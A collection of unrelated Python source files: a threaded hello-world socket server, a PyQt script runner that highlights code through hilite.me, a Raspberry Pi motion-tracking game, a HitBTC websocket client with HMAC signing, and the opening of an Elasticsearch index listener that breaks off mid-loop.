""" Multi-threaded Version Hello World Web Server """ import socket import threading def process_connection(client): """处理客户端连接""" # 接收客户端发来的数据 data = b'' while True: chunk = client.recv(1024) data += chunk if len(chunk) < 1024: break # 打印从客户端接收的数据 print(f'data: {data}') # 给客户端发送响应数据 client.sendall(b'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>Hello World</h1>') # 关闭客户端连接对象 client.close() def main(): # 创建 socket 对象 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 允许端口复用 sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 绑定 IP 和端口 sock.bind(('127.0.0.1', 8000)) # 开始监听 sock.listen(5) while True: # 等待客户端请求 client, addr = sock.accept() print(f'client type: {type(client)}\naddr: {addr}') # 创建新的线程来处理客户端连接 t = threading.Thread(target=process_connection, args=(client,)) t.start() if __name__ == '__main__': main()
main.py
import subprocess from PyQt5 import QtWidgets, QtCore, QtGui from PyQt5.QtWidgets import QApplication, QMainWindow, QDesktopWidget import sys import easygui global script global stop # Preferences clearConsoleOnScriptChanged = True class AppWindow(QMainWindow): def __init__(self): super(AppWindow, self).__init__() self.init_ui() def init_ui(self): # QtDesigner Code self.setObjectName("self") self.resize(800, 600) sizePolicy = QtWidgets.QSizePolicy( QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed ) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.sizePolicy().hasHeightForWidth()) self.setSizePolicy(sizePolicy) self.setMinimumSize(QtCore.QSize(800, 600)) self.setMaximumSize(QtCore.QSize(800, 600)) font = QtGui.QFont() font.setBold(True) font.setItalic(False) font.setUnderline(False) font.setWeight(75) self.setFont(font) self.centralwidget = QtWidgets.QWidget(self) self.centralwidget.setObjectName("centralwidget") self.textBrowser = QtWidgets.QTextBrowser(self.centralwidget) self.textBrowser.setGeometry(QtCore.QRect(30, 20, 741, 371)) palette = QtGui.QPalette() brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) self.textBrowser.setPalette(palette) font = QtGui.QFont() font.setFamily("Source Sans Pro") font.setPointSize(10) self.textBrowser.setFont(font) self.textBrowser.setDocumentTitle("") self.textBrowser.setReadOnly(True) self.textBrowser.setHtml( '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n' '<html><head><meta name="qrichtext" content="1" /><style type="text/css">\n' "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:'Source Sans Pro'; font-size:10pt; font-weight:600; font-style:normal;\">\n" '<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; line-height:125%; background-color:#f8f8f8;"><span style=" font-family:\'Courier New\'; font-weight:400; font-style:italic; color:#408080;"># No script is currently opened. 
Use CTRL+O or File &gt; Open Python Script to open a script</span></p></body></html>' ) self.textBrowser.setOverwriteMode(False) self.textBrowser.setTabStopDistance(80.0) self.textBrowser.setAcceptRichText(True) self.textBrowser.setPlaceholderText("") self.textBrowser.setObjectName("textBrowser") self.executeScript = QtWidgets.QPushButton(self.centralwidget) self.executeScript.setEnabled(False) self.executeScript.setGeometry(QtCore.QRect(660, 510, 111, 31)) self.stopScript = QtWidgets.QPushButton(self.centralwidget) self.stopScript.setEnabled(True) self.stopScript.setGeometry(QtCore.QRect(660, 475, 111, 31)) font = QtGui.QFont() font.setPointSize(10) font.setBold(False) font.setWeight(50) self.executeScript.setFont(font) self.executeScript.setObjectName("executeScript") self.stopScript.setFont(font) self.stopScript.setObjectName("stopScript") self.scriptName = QtWidgets.QLabel(self.centralwidget) self.scriptName.setGeometry(QtCore.QRect(30, -10, 741, 41)) font = QtGui.QFont() font.setBold(False) font.setWeight(50) self.scriptName.setFont(font) self.scriptName.setObjectName("scriptName") self.scriptConsole = QtWidgets.QTextBrowser(self.centralwidget) self.scriptConsole.setGeometry(QtCore.QRect(30, 450, 611, 91)) palette = QtGui.QPalette() brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) self.scriptConsole.setPalette(palette) font = QtGui.QFont() font.setPointSize(10) font.setBold(False) font.setWeight(50) self.scriptConsole.setFont(font) self.scriptConsole.setObjectName("scriptConsole") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(30, 400, 61, 21)) self.label_2.setAlignment(QtCore.Qt.AlignCenter) self.label_2.setObjectName("label_2") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(110, 400, 61, 21)) self.label_3.setAlignment(QtCore.Qt.AlignCenter) self.label_3.setObjectName("label_3") self.delayAmount = QtWidgets.QDoubleSpinBox(self.centralwidget) self.delayAmount.setGeometry(QtCore.QRect(110, 421, 61, 20)) self.delayAmount.setMaximum(999.0) self.delayAmount.setProperty("value", 0.5) self.delayAmount.setObjectName("delayAmount") self.repeatAmount = QtWidgets.QSpinBox(self.centralwidget) self.repeatAmount.setGeometry(QtCore.QRect(30, 421, 61, 21)) self.repeatAmount.setMaximum(99999) self.repeatAmount.setProperty("value", 1) self.repeatAmount.setObjectName("repeatAmount") self.setCentralWidget(self.centralwidget) self.menubar = QtWidgets.QMenuBar(self) self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21)) self.menubar.setObjectName("menubar") self.menuFile = QtWidgets.QMenu(self.menubar) self.menuFile.setObjectName("menuFile") self.setMenuBar(self.menubar) self.statusbar = QtWidgets.QStatusBar(self) self.statusbar.setObjectName("statusbar") self.setStatusBar(self.statusbar) self.actionClose = QtWidgets.QAction(self) self.actionClose.setObjectName("actionClose") self.actionOpen_File = QtWidgets.QAction(self) self.actionOpen_File.setShortcutContext(QtCore.Qt.ApplicationShortcut) self.actionOpen_File.setVisible(True) self.actionOpen_File.setMenuRole(QtWidgets.QAction.TextHeuristicRole) 
self.actionOpen_File.setIconVisibleInMenu(True) self.actionOpen_File.setShortcutVisibleInContextMenu(True) self.actionOpen_File.setObjectName("actionOpen_File") self.actionClose_File = QtWidgets.QAction(self) self.actionClose_File.setShortcutContext(QtCore.Qt.ApplicationShortcut) self.actionClose_File.setShortcutVisibleInContextMenu(True) self.actionClose_File.setObjectName("actionClose_File") self.menuFile.addAction(self.actionOpen_File) self.menuFile.addAction(self.actionClose_File) self.menubar.addAction(self.menuFile.menuAction()) self.retranslateUi() QtCore.QMetaObject.connectSlotsByName(self) # Center Window geo = self.frameGeometry() center = QDesktopWidget().availableGeometry().center() geo.moveCenter(center) self.move(geo.topLeft()) self.show() # Action Triggers self.actionOpen_File.triggered.connect(self.openfile) self.executeScript.clicked.connect(self.execute) self.stopScript.clicked.connect(self.cancelexecute) self.actionClose_File.triggered.connect(self.closefile) def retranslateUi(self): _translate = QtCore.QCoreApplication.translate self.setWindowTitle(_translate("self", "Python Script Executor")) self.executeScript.setText(_translate("self", "Execute")) self.stopScript.setText(_translate("self", "Stop")) self.scriptName.setText(_translate("self", "No Script Selected")) self.scriptConsole.setHtml( _translate( "self", '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n' '<html><head><meta name="qrichtext" content="1" /><style type="text/css">\n' "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:'MS Shell Dlg 2'; font-size:10pt; font-weight:400; font-style:normal;\">\n" '<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><br /></p></body></html>', ) ) self.label_2.setText(_translate("self", "Repeat")) self.label_3.setText(_translate("self", "Delay")) self.menuFile.setTitle(_translate("self", "File")) self.actionClose.setText(_translate("self", "Close")) self.actionOpen_File.setText(_translate("self", "Open File")) self.actionOpen_File.setStatusTip(_translate("self", "Open a Python Script")) self.actionOpen_File.setShortcut(_translate("self", "Ctrl+O")) self.actionClose_File.setText(_translate("self", "Close File")) self.actionClose_File.setStatusTip( _translate("self", "Close Current Python Script") ) self.actionClose_File.setShortcut(_translate("self", "Ctrl+W")) def openfile(self): path = easygui.fileopenbox( title="Open a Python Script", default="c:/*.py", filetypes=["*.py", "*.pyc", "Python files"], ) if path: if not path.endswith((".py", "pyc")): easygui.exceptionbox( "This program only accepts Python files!", "Exception Occurred" ) else: import requests global script script = path self.scriptName.setText(path.split("\\")[-1]) if clearConsoleOnScriptChanged: self.scriptConsole.clear() with open(path) as f: query = {"code": f.read(), "style": "default"} response = requests.get("http://hilite.me/api", params=query).text self.textBrowser.setHtml(response) self.executeScript.setEnabled(True) def closefile(self): if self.executeScript.isEnabled(): self.executeScript.setEnabled(False) self.scriptConsole.clear() self.textBrowser.clear() self.scriptName.setText("No Script Selected") def execute(self): import threading def execute_thread(): if script: repeat = self.repeatAmount.value() self.executeScript.setEnabled(False) global stop stop = False while repeat > 0: if stop: self.executeScript.setEnabled(False) 
break import time proc = subprocess.Popen( ["python", script], stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) output = proc.communicate()[0].decode("utf-8") self.scriptConsole.append(output) self.scriptConsole.moveCursor(QtGui.QTextCursor.End) QApplication.processEvents() repeat -= 1 if repeat != 0: time.sleep(self.delayAmount.value()) self.executeScript.setEnabled(True) x = threading.Thread(target=execute_thread) x.daemon = True x.start() def cancelexecute(self): global stop stop = True self.executeScript.setEnabled(True) if __name__ == "__main__": app = QApplication(sys.argv) window = AppWindow() sys.exit(app.exec_())
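# --- Alternative sketch (not part of the original file) ---
# execute_thread() above waits on proc.communicate(), so the console only
# updates once the script finishes.  A hedged sketch of streaming the output
# line by line instead; the append_line callback is hypothetical.
def _stream_script_output(script_path, append_line):
    import subprocess

    proc = subprocess.Popen(
        ["python", script_path],
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,                      # decode bytes to str as they arrive
        bufsize=1,                      # line-buffered
    )
    for line in proc.stdout:            # yields lines as the script prints them
        append_line(line.rstrip("\n"))
    proc.wait()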
hotspot-game.py
#!/usr/bin/env python """ hotspot-game ver 0.8 written by Claude Pageau pageauc@gmail.com Raspberry (Pi) - python opencv2 motion tracking using picamera module This is a raspberry pi python opencv2 motion tracking demonstration game. It will detect motion in the field of view and return x and y coordinates of the most dominant contour. Keep your body still and move your hand to activate menu's and hit the hotspot box to score points. The High score is saved in a file. Some of this code is base on a YouTube tutorial by Kyle Hounslow using C here https://www.youtube.com/watch?v=X6rPdRZzgjg Here is my YouTube video demonstrating motion tracking using a Raspberry Pi B2 https://youtu.be/09JS7twPBsQ Requires a Raspberry Pi with a RPI camera module installed and configured dependencies sudo apt-get update sudo apt-get upgrade sudo apt-get install python-opencv python-picamera """ progname = "hotspot_game.py ver 0.8" print("%s using python2 and OpenCV2" % (progname)) print("Loading Please Wait ....") import os import time from picamera import PiCamera from picamera.array import PiRGBArray import cv2 import numpy as np from threading import Thread from random import randint # Display Settings window_on = True # Set to True displays opencv windows (GUI desktop reqd) WINDOW_BIGGER = 1.5 # resize multiplier if window_on=True then makes opencv window bigger debug = True # Set to False for no data display # Game Settings hi_score_path = "hotspot_hi_score" # Game Timers target_timer = 4 # seconds to show target rectangle on screen before moving it # Game Settings hotspot_skill = 150 # starting size of rectangle in pixels hotspot_max_levels = 10 # default=10 Number of game levels lasting hotspot_level_timer hotspot_level_timer = 10 # seconds of time on each level hotspot_min_size = int( hotspot_skill / 8 ) # Camera Settings CAMERA_WIDTH = 640 CAMERA_HEIGHT = 480 CAMERA_HFLIP = False CAMERA_VFLIP = True CAMERA_ROTATION = 0 CAMERA_FRAMERATE = 45 # Menu Settings MENU_COUNTER = 12 # number of motions inside menu for selection MENU_WIDTH = 200 MENU_HEIGHT = 75 MENU_LINE_WIDTH = 2 # Motion Tracking Settings THRESHOLD_SENSITIVITY = 25 BLUR_SIZE = 10 MIN_AREA = 600 # excludes all contours less than or equal to this Area CIRCLE_SIZE = 8 # diameter of circle to show motion location in window CIRCLE_LINE = 3 # thickness of line for circle FONT_SCALE = .5 # OpenCV window text font size scaling factor default=.5 (lower is smaller) LINE_THICKNESS = 2 # thickness of bounding line in pixels big_w = int(CAMERA_WIDTH * WINDOW_BIGGER) big_h = int(CAMERA_HEIGHT * WINDOW_BIGGER) #----------------------------------------------------------------------------------------------- class PiVideoStream: # Video Stream using Treading def __init__(self, resolution=(CAMERA_WIDTH, CAMERA_HEIGHT), framerate=CAMERA_FRAMERATE, rotation=0, hflip=False, vflip=False): # initialize the camera and stream self.camera = PiCamera() self.camera.resolution = resolution self.camera.rotation = rotation self.camera.framerate = framerate self.camera.hflip = hflip self.camera.vflip = vflip self.rawCapture = PiRGBArray(self.camera, size=resolution) self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port=True) # initialize the frame and the variable used to indicate # if the thread should be stopped self.frame = None self.stopped = False def start(self): # start the thread to read frames from the video stream t = Thread(target=self.update, args=()) t.daemon = True t.start() return self def update(self): # keep looping 
infinitely until the thread is stopped for f in self.stream: # grab the frame from the stream and clear the stream in # preparation for the next frame self.frame = f.array self.rawCapture.truncate(0) # if the thread indicator variable is set, stop the thread # and resource camera resources if self.stopped: self.stream.close() self.rawCapture.close() self.camera.close() return def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True #----------------------------------------------------------------------------------------------- def read_hiscore(hi_score_path, hi_score): if not os.path.exists(hi_score_path): open(hi_score_path, 'w').close() f = open(hi_score_path, 'w+') f.write(str(hi_score)) f.close() with open(hi_score_path, 'r') as f: hi_score = f.read() f.closed hi_score = int(hi_score) return hi_score #----------------------------------------------------------------------------------------------- def save_hiscore(hi_score_path, hi_score): if not os.path.exists(hi_score_path): open(hi_score_path, 'w').close() f = open(hi_score_path, 'w+') f.write(str(hi_score)) f.close() #----------------------------------------------------------------------------------------------- def check_for_hit(x,y): global hsx global hsy global hotspot_size got_hit = False # procedure for processing motion location data if ( x < hsx + hotspot_size and x > hsx - hotspot_size and y < hsy + hotspot_size and y > hsy - hotspot_size): got_hit = True return got_hit #----------------------------------------------------------------------------------------------- def hotspot_game(): print("Initializing Camera ....") # Setup video stream on a processor Thread for faster speed vs = PiVideoStream().start() vs.camera.rotation = CAMERA_ROTATION vs.camera.hflip = CAMERA_HFLIP vs.camera.vflip = CAMERA_VFLIP time.sleep(2.0) # Give Camera time to initialize # initialize Variables global hsx global hsy global hotspot_size level_timer = hotspot_level_timer hsx = randint(10, CAMERA_WIDTH - int(CAMERA_WIDTH/8)) hsy = randint(10, CAMERA_HEIGHT - int(CAMERA_HEIGHT/8)) target_start = time.time() level_start_time = time.time() hotspot_hiscore = 0 hotspot_hiscore = read_hiscore(hi_score_path, hotspot_hiscore) hotspot_size = hotspot_skill hotspot_score = 0 hotspot_level = 1 player = "PLAYER " # menu hitcounters player1_hitcount = 0 player2_hitcount = 0 play_hitcount = 0 quit_hitcount = 0 end_of_game = False motion_found = False found_hit = False ready_counter = 4 # Game Section indicators begingame = True readyplayer = False playgame = False endgame = False # Initialize first image as stream.array image2 = vs.read() grayimage1 = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY) while not end_of_game: # initialize variables image2 = vs.read() # Initialize second image # Convert image to gray scale for start of motion tracking grayimage2 = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY) # Get differences between the two greyed, blurred images differenceimage = cv2.absdiff(grayimage1, grayimage2) grayimage1 = grayimage2 # Update grayimage1 for next iteration differenceimage = cv2.blur(differenceimage,(BLUR_SIZE,BLUR_SIZE)) # Get threshold of difference image based on THRESHOLD_SENSITIVITY variable retval, thresholdimage = cv2.threshold(differenceimage,THRESHOLD_SENSITIVITY,255,cv2.THRESH_BINARY) # Get all the contours found in the thresholdimage contours, hierarchy = cv2.findContours(thresholdimage,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) total_contours = 
len(contours) if playgame: biggest_area = MIN_AREA else: biggest_area = 4000 motion_found = False cx = -1 cy = -1 cw = -1 ch = -1 found_area = 0 # find contour with biggest area for c in contours: # get area of next contour found_area = cv2.contourArea(c) # find the middle of largest bounding rectangle if found_area > biggest_area: motion_found = True biggest_area = found_area (x, y, w, h) = cv2.boundingRect(c) cx = x + w/2 # put circle in middle of width cy = y + h/2 # put circle closer to top cw = w ch = h if window_on: if begingame: # Pick Players # Display Player Choice Menu player1_x = int(CAMERA_WIDTH/6) player1_y = 200 cv2.rectangle(image2, (player1_x, player1_y), (player1_x+ MENU_WIDTH, player1_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "PLAYER 1", ( player1_x + int(MENU_WIDTH/3), int( player1_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Display Quit Menu player2_x = player1_x + MENU_WIDTH + 20 player2_y = 200 cv2.rectangle(image2, (player2_x, player2_y), (player2_x+ MENU_WIDTH, player2_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "PLAYER 2", ( player2_x + int(MENU_WIDTH/3), int( player2_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Player 1 Menu Box if (cx > player1_x and cx < player1_x + MENU_WIDTH and cy > player1_y and cy < player1_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) player1_hitcount += 1 player2_hitcount = 0 if player1_hitcount > MENU_COUNTER: player = "PLAYER 1" player1_hitcount = 0 player2_hitcount = 0 begingame = False endgame = False playgame = False readyplayer = True ready_counter = 4 # Player 2 Menu Box elif (cx > player2_x and cx < player2_x + MENU_WIDTH and cy > player2_y and cy < player2_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) player2_hitcount += 1 player1_hitcount = 0 if player2_hitcount > MENU_COUNTER: player = "PLAYER 2" player1_hitcount = 0 player2_hitcount = 0 begingame = False endgame = False playgame = False readyplayer = True ready_counter = 4 else: cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,255, 0),CIRCLE_LINE) elif readyplayer: # Player Count Down to Start Playing ready_counter = ready_counter - 1 if ready_counter < 0: ready_counter = 4 readyplayer = False endgame = False playgame = True elif playgame: # Main Hotspot Game if time.time() - level_start_time > level_timer: level_start_time = time.time() if hotspot_level < hotspot_max_levels: hotspot_level += 1 else: hotspot_level = hotspot_max_levels begingame = False playgame = False endgame = True if hotspot_size < hotspot_min_size: hotspot_size = hotspot_min_size else: hotspot_size = hotspot_size - int(hotspot_skill/ hotspot_max_levels) if motion_found: found_hit = check_for_hit(cx,cy) # show small circle at motion location if found_hit: hotspot_score += 5 # Update Score cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) cv2.rectangle(image2,(hsx, hsy), (hsx + hotspot_size, hsy + hotspot_size), (0,0,255),LINE_THICKNESS +1) else: cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,255,0),CIRCLE_LINE) cv2.rectangle(image2,(hsx, hsy), (hsx + hotspot_size, hsy + hotspot_size), (0,255,0),LINE_THICKNESS) # display a target square for hotspot game if selected target_diff = time.time() - target_start if target_diff > target_timer: hsx = randint(int(CAMERA_WIDTH/8), CAMERA_WIDTH - int(CAMERA_WIDTH/8)) hsy = randint(int(CAMERA_HEIGHT/8), CAMERA_HEIGHT - int(CAMERA_HEIGHT/8)) target_start = time.time() elif 
endgame: # Game result display and Play, Quit Menu # Game Over ask to play again. play_x = int(CAMERA_WIDTH/6) play_y = 200 if hotspot_score > hotspot_hiscore: m_text = "GAME OVER .. NEW HI SCORE %i" % ( hotspot_score ) save_hiscore(hi_score_path, hotspot_score) else: m_text = "GAME OVER .. YOUR SCORE %i" % ( hotspot_score ) cv2.putText(image2, m_text, ( play_x, int(CAMERA_HEIGHT/3)), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,0,255), 2) # Display Play and Quit Menu Choices # Play Again Menu Box cv2.rectangle(image2, (play_x, play_y), (play_x+ MENU_WIDTH, play_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "PLAY AGAIN ?", ( play_x + int(MENU_WIDTH/3), int( play_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Display Quit Menu Box quit_x = play_x + MENU_WIDTH + 20 quit_y = 200 cv2.rectangle(image2, (quit_x, quit_y), (quit_x+ MENU_WIDTH, quit_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "QUIT", ( quit_x + int(MENU_WIDTH/3), int( quit_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Play Again Menu Box if (cx > play_x and cx < play_x + MENU_WIDTH and cy > play_y and cy < play_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) play_hitcount += 1 quit_hitcount = 0 if play_hitcount > MENU_COUNTER: play_hitcount = 0 quit_hitcount = 0 hotspot_size = hotspot_skill if hotspot_score > hotspot_hiscore: hotspot_hiscore = hotspot_score hotspot_score = 0 hotspot_level = 1 end_of_game = False playgame = False endgame = False readyplayer = False begingame = True # Quit Menu Box elif (cx > quit_x and cx < quit_x + MENU_WIDTH and cy > quit_y and cy < quit_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) quit_hitcount += 1 play_hitcount = 0 if quit_hitcount > MENU_COUNTER: playgame = False begingame = False end_of_game = True else: cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,255, 0),CIRCLE_LINE) if readyplayer: # Display Player Count Down to Start New Game time.sleep(1.5) cv2.putText(image2, "READY " + player, ( 200, int( player2_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,0,255), MENU_LINE_WIDTH) cv2.putText(image2, str(ready_counter) , ( 300, int( player2_y + MENU_HEIGHT/2) + 40), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,0,255), MENU_LINE_WIDTH) else: # Display Game Information at top of Screen m_text = "%s SCORE %i LEVEL %i HI SCORE %i " % ( player, hotspot_score, hotspot_level, hotspot_hiscore) cv2.putText(image2, m_text, ( 2, 20), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,255,0), 2) if WINDOW_BIGGER > 1: # resize motion window to desired size image2 = cv2.resize(image2, (big_w, big_h)) cv2.imshow('HOTSPOT GAME q in Window to Quit', image2) # bigger size else: # display original image size motion window cv2.imshow('HOTSPOT BAME q in Window to Quit', image2) # original size # cv2.imshow('Threshold Image', thresholdimage) # cv2.imshow('Difference Image',differenceimage if cv2.waitKey(1) & 0xFF == ord('q'): # Close Window if q pressed cv2.destroyAllWindows() print("") print("ctrl-q pressed End %s" % (progname)) vs.stop() end_of_game = True if debug: if motion_found: print("total_Contours=%2i Motion at cx=%3i cy=%3i Area:%3ix%3i=%5i" % (total_contours, cx ,cy, cw, ch, cw*ch)) #----------------------------------------------------------------------------------------------- if __name__ == '__main__': try: hotspot_game() finally: print("") print("+++++++++++++++++++++++++++++++++++") print("%s - Exiting Program" % progname) 
print("+++++++++++++++++++++++++++++++++++") print("")
hitbtc.py
# Import Built-Ins
import logging
from threading import Thread
from queue import Queue, Empty
import json
import time
import hmac
import hashlib

# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException

# Import Homebrew
from .base import WSSAPI

# Init Logging Facilities
log = logging.getLogger(__name__)


class HitBTCWSS(WSSAPI):
    def __init__(self, key=None, secret=None):
        data_addr = 'ws://api.hitbtc.com:80'
        super(HitBTCWSS, self).__init__(data_addr, 'HitBTC')
        self.trader_addr = 'ws://api.hitbtc.com:8080'

        self.data_thread = None
        self.supervisor_thread = None
        self.trade_thread = None

        self.key = key
        self.secret = secret

        self.trade_command_q = Queue()

    def start(self, duplex=False):
        super(HitBTCWSS, self).start()

        if duplex:
            self.trade_thread = Thread(target=self._trade_thread,
                                       name='Trader Thread')
            self.trade_thread.daemon = True
            self.trade_thread.start()

        self.data_thread = Thread(target=self._data_thread, name='Data Thread')
        self.data_thread.daemon = True
        self.data_thread.start()

    def stop(self):
        super(HitBTCWSS, self).stop()
        self.data_thread.join()
        if self.trade_thread:
            self.trade_thread.join()

    def eval_command(self, cmd):
        if cmd == 'restart_data':
            self.data_thread.join()
            self.data_thread = Thread(target=self._data_thread,
                                      name='Data Thread')
            self.data_thread.start()

    def _data_thread(self):
        try:
            conn = create_connection(self.addr, http_proxy_host='127.0.0.1',
                                     http_proxy_port=1087)
        except Exception:
            self._controller_q.put('restart_data')
            return

        while self.running:
            try:
                data = conn.recv()
                data = json.loads(data)
            except WebSocketTimeoutException:
                self._controller_q.put('restart_data')
                return

            try:
                pair = data['MarketDataIncrementalRefresh']['symbol']
                endpoint = 'MarketDataIncrementalRefresh'
            except KeyError:
                pair = data['MarketDataSnapshotFullRefresh']['symbol']
                endpoint = 'MarketDataSnapshotFullRefresh'

            self.data_q.put((endpoint, pair, data[endpoint], time.time()))

    def _trade_thread(self):
        try:
            conn = create_connection(self.trader_addr)
        except Exception:
            log.exception('Trader Thread Error!')
            self._controller_q.put('restart_trader')
            return

        while self.running:
            try:
                data = conn.recv()
            except WebSocketTimeoutException:
                self._controller_q.put('restart_data')
                return

            self.data_q.put(json.loads(data))

            try:
                # Non-blocking get so market data keeps flowing while no
                # trade command is queued (a blocking get() would never raise Empty).
                payload = self.trade_command_q.get(block=False)
            except Empty:
                continue

            try:
                conn.send(self.sign(payload))
            except (WebSocketTimeoutException, ConnectionResetError):
                continue

    def sign(self, payload):
        """
        Wrap the payload in an apikey/nonce message and attach an
        HMAC-SHA512 signature.

        :param payload: dict of request parameters
        :return: JSON string ready to be sent over the websocket
        """
        nonce = str(int(time.time() * 1000))
        package = {'apikey': self.key,
                   'message': {'nonce': nonce, 'payload': payload}}

        # hmac.new() needs bytes for both the key and the message; the previous
        # version accessed a non-existent `.hexdigest` attribute on the JSON string.
        secret = self.secret.encode() if isinstance(self.secret, str) else self.secret
        message = json.dumps(payload).encode()
        signature = hmac.new(secret, message, hashlib.sha512).hexdigest()
        package['signature'] = signature
        return json.dumps(package)

    def send(self, payload, auth=False):
        pkg = self.sign(payload) if auth else payload
        self.trade_command_q.put(pkg)
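# --- Standalone signing sketch (not part of the original module) ---
# A self-contained illustration of the HMAC-SHA512 pattern used by
# HitBTCWSS.sign() above: both the secret and the serialized message must be
# bytes before they reach hmac.new().  The secret and payload are made up.
def _hmac_sha512_demo():
    import hashlib
    import hmac
    import json

    secret = b"example-secret"                       # hypothetical API secret
    payload = {"nonce": "1700000000000", "payload": {"op": "ping"}}
    message = json.dumps(payload).encode()           # bytes, as hmac requires
    return hmac.new(secret, message, hashlib.sha512).hexdigest()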
es_index_listener.py
"""\ Example. %(prog)s production.ini """ from webtest import TestApp from snovault import STORAGE from snovault.elasticsearch import ELASTIC_SEARCH import atexit import datetime import elasticsearch.exceptions import json import logging import os import psycopg2 import select import signal import socket import sqlalchemy.exc import sys import threading import time from urllib.parse import parse_qsl log = logging.getLogger(__name__) EPILOG = __doc__ DEFAULT_TIMEOUT = 60 PY2 = sys.version_info[0] == 2 # We need this because of MVCC visibility. # See slide 9 at http://momjian.us/main/writings/pgsql/mvcc.pdf # https://devcenter.heroku.com/articles/postgresql-concurrency def run(testapp, timeout=DEFAULT_TIMEOUT, dry_run=False, path='/index', control=None, update_status=None): assert update_status is not None timestamp = datetime.datetime.now().isoformat() update_status( status='connecting', timestamp=timestamp, timeout=timeout, ) # Make sure elasticsearch is up before trying to index. if path == '/index_file': es = testapp.app.registry['snp_search'] else: es = testapp.app.registry[ELASTIC_SEARCH] # Wait until cluster comes up es.cluster.health(wait_for_status='yellow', request_timeout=60) es.info() log.info('es_index_listener given path: ' + path) max_xid = 0 DBSession = testapp.app.registry[STORAGE].write.DBSession engine = DBSession.bind # DBSession.bind is configured by app init # noqa http://docs.sqlalchemy.org/en/latest/faq.html#how-do-i-get-at-the-raw-dbapi-connection-when-using-an-engine connection = engine.pool.unique_connection() try: connection.detach() conn = connection.connection conn.autocommit = True conn.set_session(readonly=True) sockets = [conn] if control is not None: sockets.append(control) recovery = None listening = False with conn.cursor() as cursor: while True: if not listening: # cannot execute LISTEN during recovery cursor.execute("""SELECT pg_is_in_recovery();""") recovery, = cursor.fetchone() if not recovery: # http://initd.org/psycopg/docs/advanced.html#asynchronous-notifications cursor.execute("""LISTEN "snovault.transaction";""") 